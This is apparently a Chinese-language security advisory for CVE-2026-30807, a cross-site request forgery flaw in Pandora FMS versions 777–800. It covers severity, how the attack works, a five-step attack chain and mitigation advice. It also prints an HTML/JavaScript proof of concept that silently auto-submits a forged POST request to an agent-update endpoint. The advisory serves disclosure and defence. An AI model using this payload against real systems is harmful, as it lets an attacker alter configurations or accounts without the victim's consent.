CVE-2026-30807 Pandora FMS跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-30807

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Pandora FMS

漏洞概述

CVE-2026-30807 是 Pandora FMS 系统中发现的一个高危漏洞。该漏洞源于跨站请求伪造（CSRF）缺陷，允许攻击者诱导已登录用户访问恶意网页，从而在用户不知情的情况下执行未授权的操作。受影响的版本为 Pandora FMS 777 至 800 版本。由于 CVSS 评分高达 8.8，且无需认证即可触发（需用户交互），攻击者可利用此漏洞严重威胁系统的机密性、完整性和可用性。管理员应尽快检查系统版本并采取补救措施。

技术细节

该漏洞属于典型的跨站请求伪造（CSRF）漏洞。Pandora FMS 在处理关键操作请求时，未充分验证请求来源的合法性或缺乏有效的 Anti-CSRF Token 机制。攻击者可以构建一个精心设计的恶意网页，其中包含指向 Pandora FMS 接口的 HTTP 请求（如 POST 或 GET 请求）。当受害者（具备管理员权限的合法用户）在保持 Pandora FMS 登录状态的情况下访问该恶意网页时，浏览器会自动附带受害者的会话凭证（Cookie）向目标服务器发送请求。由于服务器无法区分请求是由用户自主发起还是由恶意页面诱导发起，因此会执行相应的操作。由于漏洞 CVSS 向量显示无需认证（PR:N）且对 CIA 三要素影响均为高（C:H/I:H/A:H），攻击者可利用此漏洞修改系统配置、添加恶意账户或破坏关键数据，从而导致系统完全被接管或拒绝服务。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是存在漏洞的 Pandora FMS 版本（777至800）。

STEP 2

构建载荷

攻击者创建一个包含恶意 HTML/JavaScript 代码的网页，该代码向 Pandora FMS 的关键功能接口发送未授权的 HTTP 请求。

STEP 3

社会工程学

攻击者通过钓鱼邮件或其他手段，诱导拥有 Pandora FMS 管理员权限的受害者点击并访问该恶意网页。

STEP 4

执行攻击

受害者在浏览器中登录了 Pandora FMS 的状态下访问网页。浏览器自动携带受害者的 Session Cookie 向服务器发送请求。

STEP 5

达成效果

Pandora FMS 服务器接收并处理请求，执行了更改配置、添加用户或删除数据等高危操作，导致系统机密性、完整性或可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html>
  <!-- Proof of Concept for CVE-2026-30807 -->
  <!-- This PoC demonstrates a CSRF attack vector against Pandora FMS -->
  <body>
    <h1>CVE-2026-30807 CSRF PoC</h1>
    <p>Attempting to perform unauthorized action...</p>
    <script>
      // Target URL where the vulnerability exists (Example endpoint)
      var targetUrl = "http://target-pandorafms-url/index.php?sec=workspace&sec2=operation/agentes/ver_agente&update_agent";
      
      // Parameters to be sent in the request
      var params = "id_group=1&nombre=MaliciousUpdate&descripcion=CSRF_PoC";
      
      // Create a form to submit the POST request
      var form = document.createElement('form');
      form.action = targetUrl;
      form.method = 'POST';
      
      // Split parameters and add to form
      var paramList = params.split('&');
      for (var i = 0; i < paramList.length; i++) {
        var pair = paramList[i].split('=');
        var input = document.createElement('input');
        input.type = 'hidden';
        input.name = pair[0];
        input.value = pair[1];
        form.appendChild(input);
      }
      
      // Append form and auto-submit
      document.body.appendChild(form);
      form.submit();
    </script>
  </body>
</html>

影响范围

Pandora FMS 777

Pandora FMS 800

Pandora FMS 777 - 800

防御指南

临时缓解措施

建议立即将 Pandora FMS 升级至官方发布的最新修复版本。如果无法立即升级，应在网络边界部署严格的访问控制策略，限制管理员仅从可信网络访问管理后台，并对关键操作实施二次验证。同时，建议用户在处理邮件或点击不明链接时保持警惕，避免在登录系统状态下访问不可信网站。